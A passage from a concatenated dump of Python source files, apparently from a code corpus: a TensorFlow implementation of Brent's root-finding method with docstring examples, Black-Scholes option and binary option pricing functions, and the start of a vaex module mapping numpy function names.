finished = state.finished
# If the root is between the last two estimates, use the worst of the two
# as new contrapoint. Adjust step sizes accordingly.
replace_contrapoint = ~finished & (
value_at_last_estimate * value_at_best_estimate < constants.zero_value)
contrapoint = tf.where(replace_contrapoint, last_estimate, contrapoint)
value_at_contrapoint = tf.where(replace_contrapoint, value_at_last_estimate,
value_at_contrapoint)
step_to_last_estimate = tf.where(replace_contrapoint,
best_estimate - last_estimate,
step_to_last_estimate)
step_to_best_estimate = tf.where(replace_contrapoint, step_to_last_estimate,
step_to_best_estimate)
# If the contrapoint is a better guess than the current root estimate, swap
# them. Also, replace the worst of the two with the current contrapoint.
replace_best_estimate = tf.where(
finished, constants.false,
tf.math.abs(value_at_contrapoint) < tf.math.abs(value_at_best_estimate))
last_estimate = tf.where(replace_best_estimate, best_estimate, last_estimate)
best_estimate = tf.where(replace_best_estimate, contrapoint, best_estimate)
contrapoint = tf.where(replace_best_estimate, last_estimate, contrapoint)
value_at_last_estimate = tf.where(replace_best_estimate,
value_at_best_estimate,
value_at_last_estimate)
value_at_best_estimate = tf.where(replace_best_estimate, value_at_contrapoint,
value_at_best_estimate)
value_at_contrapoint = tf.where(replace_best_estimate, value_at_last_estimate,
value_at_contrapoint)
# Compute the tolerance used to control root search at the current position
# and the step size corresponding to the bisection method.
root_tolerance = 0.5 * (
params.absolute_root_tolerance +
params.relative_root_tolerance * tf.math.abs(best_estimate))
bisection_step = 0.5 * (contrapoint - best_estimate)
# Mark the search as finished if either:
# 1. the maximum number of iterations has been reached;
# 2. the desired tolerance has been reached (even if no root was found);
# 3. the current root estimate is good enough.
# Using zero as `function_tolerance` will check for exact roots and match
# both Brent's original algorithm and the SciPy implementation.
finished |= (num_iterations >= params.max_iterations) | (
tf.math.abs(bisection_step) <
root_tolerance) | (~tf.math.is_finite(value_at_best_estimate)) | (
tf.math.abs(value_at_best_estimate) <= params.function_tolerance)
# Determine whether interpolation or extrapolation are worth performing at
# the current position.
compute_short_step = tf.where(
finished, constants.false,
(root_tolerance < tf.math.abs(step_to_last_estimate)) &
(tf.math.abs(value_at_best_estimate) <
tf.math.abs(value_at_last_estimate)))
short_step = tf.where(
compute_short_step,
tf.where(
# The contrapoint cannot be equal to the current root estimate since
# they have opposite signs. However, it may be equal to the previous
# estimate.
tf.equal(last_estimate, contrapoint),
# If so, use the secant method to avoid a division by zero which
# would occur if using extrapolation.
_secant_step(best_estimate, last_estimate, value_at_best_estimate,
value_at_last_estimate),
# Pass values of the objective function as x values, and root
# estimates as y values in order to perform *inverse* extrapolation.
_quadratic_interpolation_step(value_at_best_estimate,
value_at_last_estimate,
value_at_contrapoint, best_estimate,
last_estimate, contrapoint)),
# Default to zero if using bisection.
constants.zero)
# Use the step calculated above if both:
# 1. step size < |previous step size|
# 2. step size < 3/4 * |contrapoint - current root estimate|
# Ensure that `short_step` was calculated by guarding the calculation with
# `compute_short_step`.
use_short_step = tf.where(
compute_short_step, 2 * tf.math.abs(short_step) < tf.minimum(
3 * tf.math.abs(bisection_step) - root_tolerance,
tf.math.abs(step_to_last_estimate)), constants.false)
# Revert to bisection when not using `short_step`.
step_to_last_estimate = tf.where(use_short_step, step_to_best_estimate,
bisection_step)
step_to_best_estimate = tf.where(
finished, constants.zero,
tf.where(use_short_step, short_step, bisection_step))
# Update the previous and current root estimates.
last_estimate = tf.where(finished, last_estimate, best_estimate)
best_estimate += tf.where(
finished, constants.zero,
tf.where(root_tolerance < tf.math.abs(step_to_best_estimate),
step_to_best_estimate,
tf.where(bisection_step > 0, root_tolerance, -root_tolerance)))
value_at_last_estimate = tf.where(finished, value_at_last_estimate,
value_at_best_estimate)
value_at_best_estimate = tf.where(finished, value_at_best_estimate,
params.objective_fn(best_estimate))
num_iterations = tf.where(finished, num_iterations, num_iterations + 1)
return [
_BrentSearchState(
best_estimate=best_estimate,
last_estimate=last_estimate,
contrapoint=contrapoint,
value_at_best_estimate=value_at_best_estimate,
value_at_last_estimate=value_at_last_estimate,
value_at_contrapoint=value_at_contrapoint,
step_to_best_estimate=step_to_best_estimate,
step_to_last_estimate=step_to_last_estimate,
num_iterations=num_iterations,
finished=finished)
]
def _prepare_brent_args(objective_fn,
left_bracket,
right_bracket,
value_at_left_bracket,
value_at_right_bracket,
absolute_root_tolerance=2e-7,
relative_root_tolerance=None,
function_tolerance=2e-7,
max_iterations=100,
stopping_policy_fn=None):
r"""Prepares arguments for root search using Brent's method.
Args:
objective_fn: Python callable for which roots are searched. It must be a
callable of a single `Tensor` parameter and return a `Tensor` of the same
shape and dtype as `left_bracket`.
left_bracket: `Tensor` or Python float representing the first starting
points. The function will search for roots between each pair of points
defined by `left_bracket` and `right_bracket`. The shape of `left_bracket`
should match that of the input to `objective_fn`.
right_bracket: `Tensor` of the same shape and dtype as `left_bracket` or
Python float representing the second starting points. The function will
search for roots between each pair of points defined by `left_bracket` and
`right_bracket`. This argument must have the same shape as `left_bracket`.
value_at_left_bracket: Optional `Tensor` or Python float representing the
value of `objective_fn` at `left_bracket`. If specified, this argument
must have the same shape as `left_bracket`. If not specified, the value
will be evaluated during the search.
Default value: None.
value_at_right_bracket: Optional `Tensor` or Python float representing the
value of `objective_fn` at `right_bracket`. If specified, this argument
must have the same shape as `right_bracket`. If not specified, the value
will be evaluated during the search.
Default value: None.
absolute_root_tolerance: Optional `Tensor` representing the absolute
tolerance for estimated roots, with the total tolerance being calculated
as `(absolute_root_tolerance + relative_root_tolerance * |root|) / 2`. If
specified, this argument must be positive, broadcast with the shape of
`left_bracket` and have the same dtype.
Default value: `2e-7`.
relative_root_tolerance: Optional `Tensor` representing the relative
tolerance for estimated roots, with the total tolerance being calculated
as `(absolute_root_tolerance + relative_root_tolerance * |root|) / 2`. If
specified, this argument must be positive, broadcast with the shape of
`left_bracket` and have the same dtype.
Default value: `None` which translates to `4 *
numpy.finfo(left_bracket.dtype.as_numpy_dtype).eps`.
function_tolerance: Optional `Tensor` representing the tolerance used to
check for roots. If the absolute value of `objective_fn` is smaller than
or equal to `function_tolerance` at a given estimate, then that estimate
is considered a root for the function. If specified, this argument must
broadcast with the shape of `left_bracket` and have the same dtype. Set to
zero to match Brent's original algorithm and to continue the search until
an exact root is found.
Default value: `2e-7`.
max_iterations: Optional `Tensor` of an integral dtype or Python integer
specifying the maximum number of steps to perform for each initial point.
Must broadcast with the shape of `left_bracket`. If an element is set to
zero, the function will not search for any root for the corresponding
points in `left_bracket` and `right_bracket`. Instead, it will return the
best estimate from the inputs.
Default value: `100`.
stopping_policy_fn: Python `callable` controlling the algorithm termination.
It must be a callable accepting a `Tensor` of booleans with the shape of
`left_bracket` (each denoting whether the search is finished for each
starting point), and returning a scalar boolean `Tensor` (indicating
whether the overall search should stop). Typical values are
`tf.reduce_all` (which returns only when the search is finished for all
pairs of points), and `tf.reduce_any` (which returns as soon as the search
is finished for any pair of points).
Default value: `None` which translates to `tf.reduce_all`.
Returns:
A tuple of 3 Python objects containing the state, parameters, and constants
to use for the search.
"""
stopping_policy_fn = stopping_policy_fn or tf.reduce_all
if not callable(stopping_policy_fn):
raise ValueError("stopping_policy_fn must be callable")
left_bracket = tf.convert_to_tensor(left_bracket, name="left_bracket")
right_bracket = tf.convert_to_tensor(
right_bracket, name="right_bracket", dtype=left_bracket.dtype)
if value_at_left_bracket is None:
value_at_left_bracket = objective_fn(left_bracket)
if value_at_right_bracket is None:
value_at_right_bracket = objective_fn(right_bracket)
value_at_left_bracket = tf.convert_to_tensor(
value_at_left_bracket,
name="value_at_left_bracket",
dtype=left_bracket.dtype.base_dtype)
value_at_right_bracket = tf.convert_to_tensor(
value_at_right_bracket,
name="value_at_right_bracket",
dtype=left_bracket.dtype.base_dtype)
if relative_root_tolerance is None:
relative_root_tolerance = default_relative_root_tolerance(
left_bracket.dtype.base_dtype)
absolute_root_tolerance = tf.convert_to_tensor(
absolute_root_tolerance,
name="absolute_root_tolerance",
dtype=left_bracket.dtype)
relative_root_tolerance = tf.convert_to_tensor(
relative_root_tolerance,
name="relative_root_tolerance",
dtype=left_bracket.dtype)
function_tolerance = tf.convert_to_tensor(
function_tolerance, name="function_tolerance", dtype=left_bracket.dtype)
max_iterations = tf.broadcast_to(
tf.convert_to_tensor(max_iterations),
name="max_iterations",
shape=left_bracket.shape)
num_iterations = tf.zeros_like(max_iterations)
false = tf.constant(False, shape=left_bracket.shape)
zero = tf.zeros_like(left_bracket)
contrapoint = zero
step_to_last_estimate = zero
step_to_best_estimate = zero
zero_value = tf.zeros_like(value_at_left_bracket)
value_at_contrapoint = zero_value
# Select the best root estimates from the inputs.
# If no search is performed (e.g. `max_iterations` is `zero`), the estimate
# computed this way will be returned. This differs slightly from the SciPy
# implementation which always returns the `right_bracket`.
swap_positions = tf.math.abs(value_at_left_bracket) < tf.math.abs(
value_at_right_bracket)
best_estimate, last_estimate = _swap_where(swap_positions, right_bracket,
left_bracket)
value_at_best_estimate, value_at_last_estimate = _swap_where(
swap_positions, value_at_right_bracket, value_at_left_bracket)
# Check if the current root estimate is good enough.
# Using zero as `function_tolerance` will check for exact roots and match both
# Brent's original algorithm and the SciPy implementation.
finished = (num_iterations >=
max_iterations) | (~tf.math.is_finite(value_at_last_estimate)) | (
~tf.math.is_finite(value_at_best_estimate)) | (
tf.math.abs(value_at_best_estimate) <= function_tolerance)
return (_BrentSearchState(
best_estimate=best_estimate,
last_estimate=last_estimate,
contrapoint=contrapoint,
value_at_best_estimate=value_at_best_estimate,
value_at_last_estimate=value_at_last_estimate,
value_at_contrapoint=value_at_contrapoint,
step_to_best_estimate=step_to_best_estimate,
step_to_last_estimate=step_to_last_estimate,
num_iterations=num_iterations,
finished=finished),
_BrentSearchParams(
objective_fn=objective_fn,
max_iterations=max_iterations,
absolute_root_tolerance=absolute_root_tolerance,
relative_root_tolerance=relative_root_tolerance,
function_tolerance=function_tolerance,
stopping_policy_fn=stopping_policy_fn),
_BrentSearchConstants(false=false, zero=zero, zero_value=zero_value))
# `_brent` currently only support inverse quadratic extrapolation.
# This will be fixed when adding the `brenth` variant.
def _brent(objective_fn,
left_bracket,
right_bracket,
value_at_left_bracket=None,
value_at_right_bracket=None,
absolute_root_tolerance=2e-7,
relative_root_tolerance=None,
function_tolerance=2e-7,
max_iterations=100,
stopping_policy_fn=None,
validate_args=False,
name=None):
r"""Finds root(s) of a function of a single variable using Brent's method.
[Brent's method](https://en.wikipedia.org/wiki/Brent%27s_method) is a
root-finding algorithm combining the bisection method, the secant method and
extrapolation. Like bisection it is guaranteed to converge towards a root if
one exists, but that convergence is superlinear and on par with less reliable
methods.
This implementation is a translation of the algorithm described in the
[original article](https://academic.oup.com/comjnl/article/14/4/422/325237).
Args:
objective_fn: Python callable for which roots are searched. It must be a
callable of a single `Tensor` parameter and return a `Tensor` of the same
shape and dtype as `left_bracket`.
left_bracket: `Tensor` or Python float representing the first starting
points. The function will search for roots between each pair of points
defined by `left_bracket` and `right_bracket`. The shape of `left_bracket`
should match that of the input to `objective_fn`.
right_bracket: `Tensor` of the same shape and dtype as `left_bracket` or
Python float representing the second starting points. The function will
search for roots between each pair of points defined by `left_bracket` and
`right_bracket`. This argument must have the same shape as `left_bracket`.
value_at_left_bracket: Optional `Tensor` or Python float representing the
value of `objective_fn` at `left_bracket`. If specified, this argument
must have the same shape as `left_bracket`. If not specified, the value
will be evaluated during the search.
Default value: None.
value_at_right_bracket: Optional `Tensor` or Python float representing the
value of `objective_fn` at `right_bracket`. If specified, this argument
must have the same shape as `right_bracket`. If not specified, the value
will be evaluated during the search.
Default value: None.
absolute_root_tolerance: Optional `Tensor` representing the absolute
tolerance for estimated roots, with the total tolerance being calculated
as `(absolute_root_tolerance + relative_root_tolerance * |root|) / 2`. If
specified, this argument must be positive, broadcast with the shape of
`left_bracket` and have the same dtype.
Default value: `2e-7`.
relative_root_tolerance: Optional `Tensor` representing the relative
tolerance for estimated roots, with the total tolerance being calculated
as `(absolute_root_tolerance + relative_root_tolerance * |root|) / 2`. If
specified, this argument must be positive, broadcast with the shape of
`left_bracket` and have the same dtype.
Default value: `None` which translates to `4 *
numpy.finfo(left_bracket.dtype.as_numpy_dtype).eps`.
function_tolerance: Optional `Tensor` representing the tolerance used to
check for roots. If the absolute value of `objective_fn` is smaller than
or equal to `function_tolerance` at a given estimate, then that estimate
is considered a root for the function. If specified, this argument must
broadcast with the shape of `left_bracket` and have the same dtype. Set to
zero to match Brent's original algorithm and to continue the search until
an exact root is found.
Default value: `2e-7`.
max_iterations: Optional `Tensor` of an integral dtype or Python integer
specifying the maximum number of steps to perform for each initial point.
Must broadcast with the shape of `left_bracket`. If an element is set to
zero, the function will not search for any root for the corresponding
points in `left_bracket` and `right_bracket`. Instead, it will return the
best estimate from the inputs.
Default value: `100`.
stopping_policy_fn: Python `callable` controlling the algorithm termination.
It must be a callable accepting a `Tensor` of booleans with the shape of
`left_bracket` (each denoting whether the search is finished for each
starting point), and returning a scalar boolean `Tensor` (indicating
whether the overall search should stop). Typical values are
`tf.reduce_all` (which returns only when the search is finished for all
pairs of points), and `tf.reduce_any` (which returns as soon as the search
is finished for any pair of points).
Default value: `None` which translates to `tf.reduce_all`.
validate_args: Python `bool` indicating whether to validate arguments such
as `left_bracket`, `right_bracket`, `absolute_root_tolerance`,
`relative_root_tolerance`, `function_tolerance`, and `max_iterations`.
Default value: `False`.
name: Python `str` name prefixed to ops created by this function.
Returns:
brent_results: A Python object containing the following attributes:
estimated_root: `Tensor` containing the best estimate explored. If the
search was successful within the specified tolerance, this estimate is
a root of the objective function.
objective_at_estimated_root: `Tensor` containing the value of the
objective function at `estimated_root`. If the search was successful
within the specified tolerance, then this is close to 0. It has the
same dtype and shape as `estimated_root`.
num_iterations: `Tensor` containing the number of iterations performed.
It has the same dtype as `max_iterations` and shape as `estimated_root`.
converged: Scalar boolean `Tensor` indicating whether `estimated_root` is
a root within the tolerance specified for the search. It has the same
shape as `estimated_root`.
Raises:
ValueError: if the `stopping_policy_fn` is not callable.
"""
with tf.name_scope(name, "brent_root", [
left_bracket, right_bracket, value_at_left_bracket,
value_at_right_bracket, max_iterations
]):
state, params, constants = _prepare_brent_args(
objective_fn, left_bracket, right_bracket, value_at_left_bracket,
value_at_right_bracket, absolute_root_tolerance,
relative_root_tolerance, function_tolerance, max_iterations,
stopping_policy_fn)
assertions = []
if validate_args:
assertions += [
tf.Assert(
tf.reduce_all(
state.value_at_last_estimate *
state.value_at_best_estimate <= constants.zero_value),
[state.value_at_last_estimate, state.value_at_best_estimate]),
tf.Assert(
tf.reduce_all(params.absolute_root_tolerance > constants.zero),
[params.absolute_root_tolerance]),
tf.Assert(
tf.reduce_all(params.relative_root_tolerance > constants.zero),
[params.relative_root_tolerance]),
tf.Assert(
tf.reduce_all(params.function_tolerance >= constants.zero),
[params.function_tolerance]),
tf.Assert(
tf.reduce_all(params.max_iterations >= state.num_iterations),
[params.max_iterations]),
]
with tf.control_dependencies(assertions):
result = tf.while_loop(
# Negate `_should_stop` to determine if the search should continue.
# This means, in particular, that tf.reduce_*all* will return only
# when the search is finished for *all* starting points.
lambda loop_vars: ~_should_stop(loop_vars, params.stopping_policy_fn),
lambda state: _brent_loop_body(state, params, constants),
loop_vars=[state])
state = result[0]
converged = tf.math.abs(state.value_at_best_estimate) <= function_tolerance
return BrentResults(
estimated_root=state.best_estimate,
objective_at_estimated_root=state.value_at_best_estimate,
num_iterations=state.num_iterations,
converged=converged)
def brentq(objective_fn,
left_bracket,
right_bracket,
value_at_left_bracket=None,
value_at_right_bracket=None,
absolute_root_tolerance=2e-7,
relative_root_tolerance=None,
function_tolerance=2e-7,
max_iterations=100,
stopping_policy_fn=None,
validate_args=False,
name=None):
r"""Finds root(s) of a function of single variable using Brent's method.
[Brent's method](https://en.wikipedia.org/wiki/Brent%27s_method) is a
root-finding algorithm combining the bisection method, the secant method and
extrapolation. Like bisection it is guaranteed to converge towards a root if
one exists, but that convergence is superlinear and on par with less reliable
methods.
This implementation is a translation of the algorithm described in the
[original article](https://academic.oup.com/comjnl/article/14/4/422/325237).
Args:
objective_fn: Python callable for which roots are searched. It must be a
callable of a single `Tensor` parameter and return a `Tensor` of the same
shape and dtype as `left_bracket`.
left_bracket: `Tensor` or Python float representing the first starting
points. The function will search for roots between each pair of points
defined by `left_bracket` and `right_bracket`. The shape of `left_bracket`
should match that of the input to `objective_fn`.
right_bracket: `Tensor` of the same shape and dtype as `left_bracket` or
Python float representing the second starting points. The function will
search for roots between each pair of points defined by `left_bracket` and
`right_bracket`. This argument must have the same shape as `left_bracket`.
value_at_left_bracket: Optional `Tensor` or Python float representing the
value of `objective_fn` at `left_bracket`. If specified, this argument
must have the same shape as `left_bracket`. If not specified, the value
will be evaluated during the search.
Default value: None.
value_at_right_bracket: Optional `Tensor` or Python float representing the
value of `objective_fn` at `right_bracket`. If specified, this argument
must have the same shape as `right_bracket`. If not specified, the value
will be evaluated during the search.
Default value: None.
absolute_root_tolerance: Optional `Tensor` representing the absolute
tolerance for estimated roots, with the total tolerance being calculated
as `(absolute_root_tolerance + relative_root_tolerance * |root|) / 2`. If
specified, this argument must be positive, broadcast with the shape of
`left_bracket` and have the same dtype.
Default value: `2e-7`.
relative_root_tolerance: Optional `Tensor` representing the relative
tolerance for estimated roots, with the total tolerance being calculated
as `(absolute_root_tolerance + relative_root_tolerance * |root|) / 2`. If
specified, this argument must be positive, broadcast with the shape of
`left_bracket` and have the same dtype.
Default value: `None` which translates to `4 *
numpy.finfo(left_bracket.dtype.as_numpy_dtype).eps`.
function_tolerance: Optional `Tensor` representing the tolerance used to
check for roots. If the absolute value of `objective_fn` is smaller than
or equal to `function_tolerance` at a given estimate, then that estimate
is considered a root for the function. If specified, this argument must
broadcast with the shape of `left_bracket` and have the same dtype. Set to
zero to match Brent's original algorithm and to continue the search until
an exact root is found.
Default value: `2e-7`.
max_iterations: Optional `Tensor` of an integral dtype or Python integer
specifying the maximum number of steps to perform for each initial point.
Must broadcast with the shape of `left_bracket`. If an element is set to
zero, the function will not search for any root for the corresponding
points in `left_bracket` and `right_bracket`. Instead, it will return the
best estimate from the inputs.
Default value: `100`.
stopping_policy_fn: Python `callable` controlling the algorithm termination.
It must be a callable accepting a `Tensor` of booleans with the shape of
`left_bracket` (each denoting whether the search is finished for each
starting point), and returning a scalar boolean `Tensor` (indicating
whether the overall search should stop). Typical values are
`tf.reduce_all` (which returns only when the search is finished for all
pairs of points), and `tf.reduce_any` (which returns as soon as the search
is finished for any pair of points).
Default value: `None` which translates to `tf.reduce_all`.
validate_args: Python `bool` indicating whether to validate arguments such
as `left_bracket`, `right_bracket`, `absolute_root_tolerance`,
`relative_root_tolerance`, `function_tolerance`, and `max_iterations`.
Default value: `False`.
name: Python `str` name prefixed to ops created by this function.
Returns:
brent_results: A Python object containing the following attributes:
estimated_root: `Tensor` containing the best estimate explored. If the
search was successful within the specified tolerance, this estimate is
a root of the objective function.
objective_at_estimated_root: `Tensor` containing the value of the
objective function at `estimated_root`. If the search was successful
within the specified tolerance, then this is close to 0. It has the
same dtype and shape as `estimated_root`.
num_iterations: `Tensor` containing the number of iterations performed.
It has the same dtype as `max_iterations` and shape as `estimated_root`.
converged: Scalar boolean `Tensor` indicating whether `estimated_root` is
a root within the tolerance specified for the search. It has the same
shape as `estimated_root`.
Raises:
ValueError: if the `stopping_policy_fn` is not callable.
#### Examples
```python
import tensorflow as tf
tf.enable_eager_execution()
# Example 1: Roots of a single function for two pairs of starting points.
f = lambda x: 63 * x**5 - 70 * x**3 + 15 * x + 2
x1 = tf.constant([-10, 1], dtype=tf.float64)
x2 = tf.constant([10, -1], dtype=tf.float64)
brentq(objective_fn=f, left_bracket=x1, right_bracket=x2)
# ==> BrentResults(
# estimated_root=array([-0.14823253, -0.14823253]),
# objective_at_estimated_root=array([3.27515792e-15, 0.]),
# num_iterations=array([11, 6]),
# converged=array([True, True]))
brentq(objective_fn=f,
left_bracket=x1,
right_bracket=x2,
stopping_policy_fn=tf.reduce_any)
# ==> BrentResults(
# estimated_root=array([-2.60718234, -0.14823253]),
# objective_at_estimated_root=array([-6.38579115e+03, 2.39763764e-11]),
# num_iterations=array([7, 6]),
# converged=array([False, True]))
# Example 2: Roots of a multiplex function for one pair of starting points.
def f(x):
return tf.constant([0., 63.], dtype=tf.float64) * x**5 \
+ tf.constant([5., -70.], dtype=tf.float64) * x**3 \
+ tf.constant([-3., 15.], dtype=tf.float64) * x \
+ 2
x1 = tf.constant([-5, -5], dtype=tf.float64)
x2 = tf.constant([5, 5], dtype=tf.float64)
brentq(objective_fn=f, left_bracket=x1, right_bracket=x2)
# ==> BrentResults(
# estimated_root=array([-1., -0.14823253]),
# objective_at_estimated_root=array([0., 2.08721929e-14]),
# num_iterations=array([13, 11]),
# converged=array([True, True]))
# Example 3: Roots of a multiplex function for two pairs of starting points.
def f(x):
return tf.constant([0., 63.], dtype=tf.float64) * x**5 \
+ tf.constant([5., -70.], dtype=tf.float64) * x**3 \
+ tf.constant([-3., 15.], dtype=tf.float64) * x \
+ 2
x1 = tf.constant([[-5, -5], [10, 10]], dtype=tf.float64)
x2 = tf.constant([[5, 5], [-10, -10]], dtype=tf.float64)
brentq(objective_fn=f, left_bracket=x1, right_bracket=x2)
# ==> BrentResults(
# estimated_root=array([
# [-1, -0.14823253],
# [-1, -0.14823253]]),
# objective_at_estimated_root=array([
# [0., 2.08721929e-14],
# [0., 2.08721929e-14]]),
# num_iterations=array([
# [13, 11],
# [15, 11]]),
# converged=array([
# [True, True],
# [True, True]]))
```
"""
return _brent(
objective_fn,
left_bracket,
right_bracket,
value_at_left_bracket=value_at_left_bracket,
value_at_right_bracket=value_at_right_bracket,
absolute_root_tolerance=absolute_root_tolerance,
relative_root_tolerance=relative_root_tolerance,
function_tolerance=function_tolerance,
max_iterations=max_iterations,
stopping_policy_fn=stopping_policy_fn,
validate_args=validate_args,
name=name)
```
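For reference, a minimal usage sketch of the `brentq` function defined above. It assumes the module is importable as `tf_quant_finance.math.root_search` and follows the same TF 1.x-style eager setup as the docstring examples; treat it as an illustration rather than part of the library.
```python
import tensorflow as tf
from tf_quant_finance.math import root_search

tf.enable_eager_execution()

# Root of f(x) = x**2 - 2 bracketed by [1, 2]; the expected root is sqrt(2).
f = lambda x: x * x - 2.0
result = root_search.brentq(
    objective_fn=f,
    left_bracket=tf.constant([1.0], dtype=tf.float64),
    right_bracket=tf.constant([2.0], dtype=tf.float64))
print(result.estimated_root.numpy())  # ==> approximately [1.41421356]
print(result.converged.numpy())       # ==> [ True]
```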
#### File: tf_quant_finance/volatility/black_scholes.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow_probability as tfp
def option_price(forwards,
strikes,
volatilities,
expiries,
discount_factors=None,
is_call_options=None,
dtype=None,
name=None):
"""Computes the Black Scholes price for a batch of European options.
## References:
[1] Hull, <NAME>., Options, Futures and Other Derivatives. Pearson, 2018.
[2] Wikipedia contributors. Black-Scholes model. Available at:
https://en.wikipedia.org/w/index.php?title=Black%E2%80%93Scholes_model
Args:
forwards: A real `Tensor` of any shape. The current forward prices to
expiry.
strikes: A real `Tensor` of the same shape and dtype as `forwards`. The
strikes of the options to be priced.
volatilities: A real `Tensor` of same shape and dtype as `forwards`. The
volatility to expiry.
expiries: A real `Tensor` of same shape and dtype as `forwards`. The expiry
for each option. The units should be such that `expiry * volatility**2` is
dimensionless.
discount_factors: A real `Tensor` of same shape and dtype as the `forwards`.
The discount factors to expiry (i.e. e^(-rT)). If not specified, no
discounting is applied (i.e. the undiscounted option price is returned).
Default value: None, interpreted as discount factors = 1.
is_call_options: A boolean `Tensor` of a shape compatible with `forwards`.
Indicates whether to compute the price of a call (if True) or a put (if
False). If not supplied, it is assumed that every element is a call.
dtype: Optional `tf.DType`. If supplied, the dtype to be used for conversion
of any supplied non-`Tensor` arguments to `Tensor`.
Default value: None which maps to the default dtype inferred by TensorFlow
(float32).
name: str. The name for the ops created by this function.
Default value: None which is mapped to the default name `option_price`.
Returns:
option_prices: A `Tensor` of the same shape as `forwards`. The Black
Scholes price of the options.
#### Examples
```python
forwards = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
strikes = np.array([3.0, 3.0, 3.0, 3.0, 3.0])
volatilities = np.array([0.0001, 102.0, 2.0, 0.1, 0.4])
expiries = 1.0
computed_prices = option_price(
forwards,
strikes,
volatilities,
expiries,
dtype=tf.float64)
# Expected print output of computed prices:
# [ 0. 2. 2.04806848 1.00020297 2.07303131]
```
"""
with tf.compat.v1.name_scope(
name,
default_name='option_price',
values=[
forwards, strikes, volatilities, expiries, discount_factors,
is_call_options
]):
forwards = tf.convert_to_tensor(forwards, dtype=dtype, name='forwards')
strikes = tf.convert_to_tensor(strikes, dtype=dtype, name='strikes')
volatilities = tf.convert_to_tensor(
volatilities, dtype=dtype, name='volatilities')
expiries = tf.convert_to_tensor(expiries, dtype=dtype, name='expiries')
if discount_factors is None:
discount_factors = 1
discount_factors = tf.convert_to_tensor(
discount_factors, dtype=dtype, name='discount_factors')
normal = tfp.distributions.Normal(
loc=tf.zeros([], dtype=forwards.dtype), scale=1)
sqrt_var = volatilities * tf.math.sqrt(expiries)
d1 = (tf.math.log(forwards / strikes) + sqrt_var * sqrt_var / 2) / sqrt_var
d2 = d1 - sqrt_var
undiscounted_calls = forwards * normal.cdf(d1) - strikes * normal.cdf(d2)
if is_call_options is None:
return discount_factors * undiscounted_calls
undiscounted_forward = forwards - strikes
undiscounted_puts = undiscounted_calls - undiscounted_forward
return discount_factors * tf.where(is_call_options, undiscounted_calls,
undiscounted_puts)
def binary_price(forwards,
strikes,
volatilities,
expiries,
discount_factors=None,
is_call_options=None,
dtype=None,
name=None):
"""Computes the Black Scholes price for a batch of European binary options.
The binary call (resp. put) option priced here is that which pays off a unit
of cash if the underlying asset has a value greater (resp. smaller) than the
strike price at expiry. Hence the binary option price is the discounted
probability that the asset will end up higher (resp. lower) than the
strike price at expiry.
## References:
[1] <NAME>., Options, Futures and Other Derivatives. Pearson, 2018.
[2] Wikipedia contributors. Binary option. Available at:
https://en.wikipedia.org/w/index.php?title=Binary_option
Args:
forwards: A real `Tensor` of any shape. The current forward prices to
expiry.
strikes: A real `Tensor` of the same shape and dtype as `forwards`. The
strikes of the options to be priced.
volatilities: A real `Tensor` of same shape and dtype as `forwards`. The
volatility to expiry.
expiries: A real `Tensor` of same shape and dtype as `forwards`. The expiry
for each option. The units should be such that `expiry * volatility**2` is
dimensionless.
discount_factors: A real `Tensor` of same shape and dtype as the `forwards`.
The discount factors to expiry (i.e. e^(-rT)). If not specified, no
discounting is applied (i.e. the undiscounted option price is returned).
Default value: None, interpreted as discount factors = 1.
is_call_options: A boolean `Tensor` of a shape compatible with `forwards`.
Indicates whether to compute the price of a call (if True) or a put (if
False). If not supplied, it is assumed that every element is a call.
dtype: Optional `tf.DType`. If supplied, the dtype to be used for conversion
of any supplied non-`Tensor` arguments to `Tensor`.
Default value: None which maps to the default dtype inferred by TensorFlow
(float32).
name: str. The name for the ops created by this function.
Default value: None which is mapped to the default name `binary_price`.
Returns:
option_prices: A `Tensor` of the same shape as `forwards`. The Black
Scholes price of the binary options with unit of cash payoff.
#### Examples
```python
forwards = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
strikes = np.array([3.0, 3.0, 3.0, 3.0, 3.0])
volatilities = np.array([0.0001, 102.0, 2.0, 0.1, 0.4])
expiries = 1.0
prices = binary_price(forwards, strikes, volatilities, expiries,
dtype=tf.float64)
# Expected print output of prices:
# [0. 0. 0.15865525 0.99764937 0.85927418]
```
"""
with tf.compat.v1.name_scope(
name,
default_name='binary_price',
values=[
forwards, strikes, volatilities, expiries, discount_factors,
is_call_options
]):
forwards = tf.convert_to_tensor(forwards, dtype=dtype, name='forwards')
strikes = tf.convert_to_tensor(strikes, dtype=dtype, name='strikes')
volatilities = tf.convert_to_tensor(
volatilities, dtype=dtype, name='volatilities')
expiries = tf.convert_to_tensor(expiries, dtype=dtype, name='expiries')
if is_call_options is None:
is_call_options = True
if discount_factors is None:
discount_factors = 1
discount_factors = tf.convert_to_tensor(
discount_factors, dtype=dtype, name='discount_factors')
sqrt_var = volatilities * tf.math.sqrt(expiries)
d2 = (tf.math.log(forwards / strikes) - sqrt_var * sqrt_var / 2) / sqrt_var
one = tf.ones_like(forwards)
d2_signs = tf.where(is_call_options, one, -one)
normal = tfp.distributions.Normal(
loc=tf.zeros([], dtype=forwards.dtype), scale=1)
return discount_factors * normal.cdf(d2_signs * d2)
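if __name__ == '__main__':
  # Added usage sketch, not part of the original module. Assumes eager execution
  # (the default in TF 2.x). It prices calls and puts on the same inputs and
  # checks put-call parity: with unit discount factors, call - put == forward - strike.
  import numpy as np
  forwards = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
  strikes = np.array([3.0, 3.0, 3.0, 3.0, 3.0])
  volatilities = np.array([0.0001, 102.0, 2.0, 0.1, 0.4])
  expiries = 1.0
  calls = option_price(forwards, strikes, volatilities, expiries, dtype=tf.float64)
  puts = option_price(forwards, strikes, volatilities, expiries,
                      is_call_options=np.zeros(5, dtype=bool), dtype=tf.float64)
  print(np.max(np.abs((calls - puts).numpy() - (forwards - strikes))))  # ==> 0.0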
``` |
{
"source": "0xflotus/vaex",
"score": 3
} |
#### File: vaex-core/vaex/functions.py
```python
import vaex.serialize
import json
import numpy as np
# @vaex.serialize.register
# class Function(FunctionSerializable):
# name maps to numpy function
# <vaex name>:<numpy name>
function_mapping = [name.strip().split(":") if ":" in name else (name, name) for name in """
sinc
sin
cos
tan
arcsin
arccos
arctan
arctan2
sinh
cosh
tanh
arcsinh
arccosh
arctanh
log
log10
log1p
exp
expm1
sqrt
abs
where
rad2deg
deg2rad
minimum
maximum
clip
nan
searchsorted
